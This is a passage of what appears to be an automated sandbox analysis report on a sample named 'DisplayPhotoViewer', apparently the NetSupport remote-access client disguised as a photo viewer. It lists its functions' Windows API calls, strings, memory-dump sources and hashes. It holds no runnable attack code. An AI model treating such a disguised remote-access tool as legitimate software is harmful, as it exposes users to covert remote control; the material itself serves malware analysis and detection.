                                                                                                    • Instruction Fuzzy Hash: 185170B5E00215AFDB11DFE5DC84BAEFBB4FB88718F104129E915A7284EB306900CB55
                                                                                                    Function 1105D820 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1105D87A
                                                                                                      • Part of subcall function 1105D260: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1105D29C
                                                                                                      • Part of subcall function 1105D260: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 1105D2F4
                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 1105D8CB
                                                                                                    • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 1105D985
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 1105D9A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Enum$Open$CloseValue
                                                                                                    • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                    • API String ID: 2823542970-1528906934
                                                                                                    • Opcode ID: 089ad50b7823bc75e90b5af304963e730fe0f07c047281062b9ca18221d0e202
                                                                                                    • Instruction ID: 410c9791a0c30090d6956da2cfe7ff6cc9ab5f05d0b384aabeb732b1c9aa4562
                                                                                                    • Opcode Fuzzy Hash: 089ad50b7823bc75e90b5af304963e730fe0f07c047281062b9ca18221d0e202
                                                                                                    • Instruction Fuzzy Hash: 03419374E4021D6BDB61CF51CD81FEEF7B8EB55708F004199EA48A7140DAB0AE81CFA1
                                                                                                    Function 11023870 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 110238A6
                                                                                                    • SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 110238B9
                                                                                                    • SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 110238CA
                                                                                                    • SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 110238D5
                                                                                                    • SendMessageA.USER32(?,000000C4,-00000001,?), ref: 110238EE
                                                                                                    • GetDC.USER32(?), ref: 110238F5
                                                                                                    • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11023905
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 11023912
                                                                                                    • GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 11023928
                                                                                                    • SelectObject.GDI32(?,?), ref: 11023937
                                                                                                    • ReleaseDC.USER32(?,?), ref: 1102393F
                                                                                                    • SetCaretPos.USER32(?,?), ref: 11023981
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$ObjectSelect$CaretExtentPoint32ReleaseText
                                                                                                    • String ID:
                                                                                                    • API String ID: 4100900918-3916222277
                                                                                                    • Opcode ID: 0bfd7c62f44634c1011658b6cb37f24d3deba47e954608c248f427f598067532
                                                                                                    • Instruction ID: 582f7d2b3bab31338bd8b7c345a81470e1a80dc91065d5da42324728f4e3bf95
                                                                                                    • Opcode Fuzzy Hash: 0bfd7c62f44634c1011658b6cb37f24d3deba47e954608c248f427f598067532
                                                                                                    • Instruction Fuzzy Hash: D9411F75A11318AFEB10DFA9C885FAEFBFDEF89700F518119E915AB284D6709901CB60
                                                                                                    Function 111554C0 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 114windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InterlockedIncrement.KERNEL32(111DEC80), ref: 111554C8
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 111554DC
                                                                                                    • SelectPalette.GDI32(00000000,00000000,00000000), ref: 1115550B
                                                                                                    • SelectPalette.GDI32(00000000,00000000,00000000), ref: 11155517
                                                                                                    • GetSystemPaletteEntries.GDI32(00000000,00000000,00000000,-00000004), ref: 1115556B
                                                                                                    • _memmove.LIBCMT ref: 111555BE
                                                                                                    • _calloc.LIBCMT ref: 111555CC
                                                                                                    • DeleteDC.GDI32(00000000), ref: 111555F3
                                                                                                      • Part of subcall function 11155410: CreateCompatibleDC.GDI32(00000000), ref: 11155414
                                                                                                      • Part of subcall function 11155410: GetDeviceCaps.GDI32(00000000,0000000E), ref: 1115543D
                                                                                                      • Part of subcall function 11155410: GetDeviceCaps.GDI32(00000000,0000000C), ref: 11155447
                                                                                                      • Part of subcall function 11155410: CreatePalette.GDI32(111DEC88), ref: 1115549E
                                                                                                      • Part of subcall function 11155410: DeleteDC.GDI32(00000000), ref: 111554AA
                                                                                                    • DeleteDC.GDI32(00000000), ref: 11155612
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Palette$CreateDelete$CapsCompatibleDeviceSelect$EntriesErrorExitIncrementInterlockedLastMessageProcessSystem_calloc_memmovewsprintf
                                                                                                    • String ID: ..\ctl32\WPALETTE.C$gPD.palsize == 256$hdc$idata->remote_paltrans
                                                                                                    • API String ID: 3281528250-101977019
                                                                                                    • Opcode ID: 74de6f36a7a00ea8dcb63e53077c38aacdb9e5e6e9b6a871b72f12bb6266f35d
                                                                                                    • Instruction ID: e2fed4c79443497c99abdac597549d0a8a2d12804970561647682f74472fa4c7
                                                                                                    • Opcode Fuzzy Hash: 74de6f36a7a00ea8dcb63e53077c38aacdb9e5e6e9b6a871b72f12bb6266f35d
                                                                                                    • Instruction Fuzzy Hash: C831F475A017117BF6E09B79EC85F5BF778AB4271DF004038FA25E6285EB76B00087A6
                                                                                                    Function 10702E50 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CapiHangup.PCICAPI(00000000,10702D88), ref: 10702E90
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00002710,00000000,10702D88), ref: 10702EA0
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 10702EDA
                                                                                                    • EnterCriticalSection.KERNEL32(10718A40), ref: 10702EE1
                                                                                                    • LeaveCriticalSection.KERNEL32(10718A40), ref: 10702EF8
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 10702F0F
                                                                                                    • CloseHandle.KERNEL32(?), ref: 10702F18
                                                                                                    • DeleteCriticalSection.KERNEL32(10718A40,00000000,10702D88), ref: 10702F25
                                                                                                    • DeleteCriticalSection.KERNEL32(107189C0), ref: 10702F2C
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 10702F34
                                                                                                    Strings
                                                                                                    • Could not stop CAPI GetMsgThread, xrefs: 10702EAD
                                                                                                    • !"Could not stop CAPI GetMsgThread", xrefs: 10702EC0
                                                                                                    • E:\nsmsrc\nsm\1201\1201\ctl32\PCICAPI.C, xrefs: 10702EBB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$CloseHandle$Delete$CapiEnterFreeHangupLeaveLibraryObjectSingleWait
                                                                                                    • String ID: !"Could not stop CAPI GetMsgThread"$Could not stop CAPI GetMsgThread$E:\nsmsrc\nsm\1201\1201\ctl32\PCICAPI.C
                                                                                                    • API String ID: 2720042353-491019462
                                                                                                    • Opcode ID: 4934f6310de586fac9f9907a1f8582dfddbdad2fc33b9cb735650272e8bbc100
                                                                                                    • Instruction ID: a66dd59e46a3f24dd24a636aba9cf80a5c87f5230636b531084ecb34b10e4d66
                                                                                                    • Opcode Fuzzy Hash: 4934f6310de586fac9f9907a1f8582dfddbdad2fc33b9cb735650272e8bbc100
                                                                                                    • Instruction Fuzzy Hash: 8C1130757002259BDB809BA4DCC9F5637A9FB0D380F48C505F901C72E4CBB4E882CB68
                                                                                                    Function 110FD620 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 84fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 110FD62D
                                                                                                    • EnterCriticalSection.KERNEL32(111E41A4,?,00000000,?,?,1114336D,?,11181663,?,11181663,000000FF,?,1114376B), ref: 110FD636
                                                                                                    • GetTickCount.KERNEL32 ref: 110FD63C
                                                                                                    • GetTickCount.KERNEL32 ref: 110FD66E
                                                                                                    • LeaveCriticalSection.KERNEL32(111E41A4,?,00000000,?,?,1114336D,?,11181663,?,11181663,000000FF,?,1114376B), ref: 110FD677
                                                                                                    • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,1114336D,?,11181663,?,11181663,000000FF,?,1114376B), ref: 110FD698
                                                                                                    • WriteFile.KERNEL32(00000000,11181663,?,?,00000000,?,00000000,?,?,1114336D,?,11181663,?,11181663,000000FF), ref: 110FD6B0
                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,1114336D,?,11181663,?,11181663,000000FF,?,1114376B), ref: 110FD6BD
                                                                                                    • GetTickCount.KERNEL32 ref: 110FD6CC
                                                                                                    • LeaveCriticalSection.KERNEL32(111E41A4,?,00000000,?,?,1114336D,?,11181663,?,11181663,000000FF,?,1114376B), ref: 110FD6D5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$CountTick$Leave$Enter$FileWrite
                                                                                                    • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                                    • API String ID: 831250470-625438208
                                                                                                    • Opcode ID: 65ec6273d6fc92f57582f7e945f7e60a72a802e23806aaaf37f6d444f05205d7
                                                                                                    • Instruction ID: 6943dc66cdb82f4251324ab481cd75a25ce24c977fa5053ebc3c03c869157947
                                                                                                    • Opcode Fuzzy Hash: 65ec6273d6fc92f57582f7e945f7e60a72a802e23806aaaf37f6d444f05205d7
                                                                                                    • Instruction Fuzzy Hash: 5721D775A612256BCB019FB6FC8D9ADBB98EB45259B014076FC15D7208D630AC00CBB0
                                                                                                    Function 11055110 Relevance: 19.7, APIs: 13, Instructions: 243windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 11055239
                                                                                                    • CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 1105524A
                                                                                                    • DeleteObject.GDI32(?), ref: 1105525B
                                                                                                    • PostMessageA.USER32(0006029E,00000800,00000000,00000000), ref: 110552C6
                                                                                                    • GetCursorPos.USER32(?), ref: 110552FD
                                                                                                      • Part of subcall function 11053B90: GetTickCount.KERNEL32 ref: 11053C06
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004C), ref: 11090E7E
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004D), ref: 11090E87
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004E), ref: 11090E8E
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(00000000), ref: 11090E97
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(0000004F), ref: 11090E9D
                                                                                                      • Part of subcall function 11090E70: GetSystemMetrics.USER32(00000001), ref: 11090EA5
                                                                                                    • GetDC.USER32(00000000), ref: 110552CE
                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 110552DB
                                                                                                    • SetPixel.GDI32(00000000,00000000,00000000,00000000), ref: 110552E7
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 110552F0
                                                                                                    • GetSystemMetrics.USER32(0000004C), ref: 1105533B
                                                                                                    • GetSystemMetrics.USER32(0000004D), ref: 11055341
                                                                                                    • GetTickCount.KERNEL32 ref: 110553AD
                                                                                                    • _free.LIBCMT ref: 11055430
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem$CountPixelTick$CombineCreateCursorDeleteMessageObjectPostRectRelease_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 4025550384-0
                                                                                                    • Opcode ID: 73a85f8422db1ac7f53281da331f7f273606fc42b5eadcf0f4b96efbdfc91eaa
                                                                                                    • Instruction ID: dde733582dc5d27516feba3788c88d60aef26b0da865da50f4b3602ac59b45a8
                                                                                                    • Opcode Fuzzy Hash: 73a85f8422db1ac7f53281da331f7f273606fc42b5eadcf0f4b96efbdfc91eaa
                                                                                                    • Instruction Fuzzy Hash: 74A16C75E007059FEBA1CF64D884BEEBBF4AF49304F10856DE91A97280EB71A984CF51
                                                                                                    Function 110039A0 Relevance: 19.7, APIs: 13, Instructions: 168COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetSysColor.USER32(00000004), ref: 110039E4
                                                                                                      • Part of subcall function 111388D0: SetBkColor.GDI32(?,00000000), ref: 111388E4
                                                                                                      • Part of subcall function 111388D0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111388F9
                                                                                                      • Part of subcall function 111388D0: SetBkColor.GDI32(?,00000000), ref: 11138901
                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 110039FF
                                                                                                    • GetSysColor.USER32(00000010), ref: 11003A12
                                                                                                    • GetSysColor.USER32(00000010), ref: 11003A29
                                                                                                    • GetSysColor.USER32(00000014), ref: 11003A40
                                                                                                    • GetSysColor.USER32(00000014), ref: 11003A57
                                                                                                    • GetSysColor.USER32(00000014), ref: 11003A74
                                                                                                    • GetSysColor.USER32(00000014), ref: 11003A8B
                                                                                                    • GetSysColor.USER32(00000010), ref: 11003AA2
                                                                                                    • GetSysColor.USER32(00000010), ref: 11003AB9
                                                                                                    • GetSysColor.USER32(00000004), ref: 11003AD0
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 11003AD7
                                                                                                    • InflateRect.USER32(?,000000FE,000000FD), ref: 11003AE5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Color$InflateRect$Text
                                                                                                    • String ID:
                                                                                                    • API String ID: 657964945-0
                                                                                                    • Opcode ID: 25838997fc70a3fdfbf75ee168d5ea41fceaea23d304056c246207b5b9a45ce5
                                                                                                    • Instruction ID: 272c1815144115b17222375b3c44a0ae66e865e3ec9b04d4a6627c8a13eb9b17
                                                                                                    • Opcode Fuzzy Hash: 25838997fc70a3fdfbf75ee168d5ea41fceaea23d304056c246207b5b9a45ce5
                                                                                                    • Instruction Fuzzy Hash: 335174B5A002096FD714DFA5CC41FBFF3B8EB94714F104A18EA11A72C6E671BA44CBA1
                                                                                                    Function 11039410 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 352COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memset
                                                                                                    • String ID: @$DoRegisterUser$Error. Failed to get username for Register, e=%d$Info. No logged on user for Register$Login name %s$P$StudentRegister
                                                                                                    • API String ID: 2102423945-4086722448
                                                                                                    • Opcode ID: 414749e8fdc4e49383018b4a0b7dcdd562eacc96e80ab1a0333a77fe8bafb1e5
                                                                                                    • Instruction ID: 4f31178f631a8a7dec43bdc43fe2311db1dd0187be63027a38d323db6ad86adb
                                                                                                    • Opcode Fuzzy Hash: 414749e8fdc4e49383018b4a0b7dcdd562eacc96e80ab1a0333a77fe8bafb1e5
                                                                                                    • Instruction Fuzzy Hash: B8E170B59106169FDB55DFA4CC84BEEB7B8AF84308F1045ADE51E97280EB70AE84CF50
                                                                                                    Function 11041130 Relevance: 19.6, APIs: 3, Strings: 8, Instructions: 302COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 1113B380: GetVersionExA.KERNEL32(111E4A50,75BF8400), ref: 1113B3B0
                                                                                                      • Part of subcall function 1113B380: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1113B3EF
                                                                                                      • Part of subcall function 1113B380: _memset.LIBCMT ref: 1113B40D
                                                                                                      • Part of subcall function 1113B380: _strncpy.LIBCMT ref: 1113B4CF
                                                                                                      • Part of subcall function 1113B380: RegCloseKey.ADVAPI32(00000000), ref: 1113B4DF
                                                                                                      • Part of subcall function 11040E90: _memset.LIBCMT ref: 11040ED6
                                                                                                      • Part of subcall function 11040E90: RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000100), ref: 11040F1D
                                                                                                      • Part of subcall function 11040E90: _strncmp.LIBCMT ref: 11040F3E
                                                                                                      • Part of subcall function 11040E90: RegEnumKeyA.ADVAPI32(00000000,00000001,?,00000100), ref: 11040F59
                                                                                                      • Part of subcall function 11040E90: RegCloseKey.ADVAPI32(00000000), ref: 11040F60
                                                                                                      • Part of subcall function 110C9870: __strdup.LIBCMT ref: 110C988A
                                                                                                      • Part of subcall function 1113AEB0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11189A50), ref: 1113AF1D
                                                                                                      • Part of subcall function 1113AEB0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110784B), ref: 1113AF5E
                                                                                                      • Part of subcall function 1113AEB0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113AFBB
                                                                                                      • Part of subcall function 110C9920: _free.LIBCMT ref: 110C994D
                                                                                                    • GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?,?,?,?,?,00000000,?,?,00000000,1119253C), ref: 11041462
                                                                                                    • GetTokenInformation.ADVAPI32(00000000,00000013(TokenIntegrityLevel),?,00000004,?,?,?,?,?,00000000,?,?,00000000,1119253C), ref: 1104147A
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,1119253C), ref: 11041482
                                                                                                    Strings
                                                                                                    Memory Dump Source
